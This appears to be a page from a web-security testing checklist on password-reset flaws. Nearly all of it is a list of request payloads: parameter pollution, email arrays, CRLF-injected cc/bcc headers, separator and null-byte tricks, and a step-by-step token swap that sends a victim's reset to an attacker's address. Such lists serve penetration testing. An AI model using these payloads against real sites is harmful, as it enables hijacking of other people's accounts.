Reset Password

Password Reset Security testing Checklist

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
#No domain:
email=victim
#No TLD (Top Level Domain):
email=victim@xyz
#change param case 
email=victim@mail.com&Email=attacker@mail.com
email@email.com**,**victim@hack.secry  
email@email**,**victim@hack.secry  
email@email.com**:**victim@hack.secry  
email@email.com**%0d%0a**victim@hack.secry  
**%0d%0a**victim@hack.secry  
**%0a**victim@hack.secry  
victim@hack.secry**%0d%0a**  
victim@hack.secry**%0a**  
victim@hack.secry**%0d**  
victim@hack.secry**%00**  
victim@hack.secry**{{}}**
step 1: Attacker Enter the victim's email or mobile number into the forgot password field.
step 2: Attacker intercept the request and got JSON data like that

{“email”:”victim@gmail.com”,”token”:1234"}
step 3: Attacker change victim email to his email id

{“email”:”attacker@gmail.com”,”token”:1234"}
and forward the request.

*Notice on the old token is deactivated or not.
PreviousRegistrationNextReview

Last updated